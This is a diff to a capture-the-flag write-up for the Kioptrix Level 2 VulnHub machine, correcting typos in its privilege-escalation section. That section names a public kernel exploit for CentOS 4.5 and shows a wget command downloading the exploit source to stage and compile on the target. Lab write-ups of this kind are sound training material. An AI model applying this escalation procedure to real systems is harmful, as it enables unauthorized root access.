jib1337/writeups_public/VulnHub/VHB_KioptrixL2/README.md

 kioptrix.level2
 ...
 ```
 This script consists of mostly just commands that can be ran manually, but having them in a script saves some time.
 Some of the more in-depth scripts wouldn't work on this machine due to incompatabilities with the version of bash.
 In any case, looking through the output, the use of CentOS 4.5 (released in 2007) warrented some investigation.
-There are some kernel exploits for this version, in in particular stood out - Rin0 privesc using ip_append_data(): https://www.exploit-db.com/exploits/9542.
+There are some kernel exploits for this version, in in particular stood out - Ring0 privesc using ip_append_data(): https://www.exploit-db.com/exploits/9542.

 ### 7. Set up the exploit
-In order exploit, the program has to be compiled and ran locally.
+In order to exploit, the program has to be compiled and ran locally.
 This can be done as the machine already has gcc installed.
-So it's just a matter of retrieving the file, hosting it and wgetting it.
+So it's just a matter of retrieving the file, hosting it, wgetting it onto the machine and compiling.
 ```bash
 kali@kali:~/Desktop/osc/kiol2$ wget https://www.exploit-db.com/raw/9542 -O ring0exploit.c
 --2020-10-27 03:56:47--  https://www.exploit-db.com/raw/9542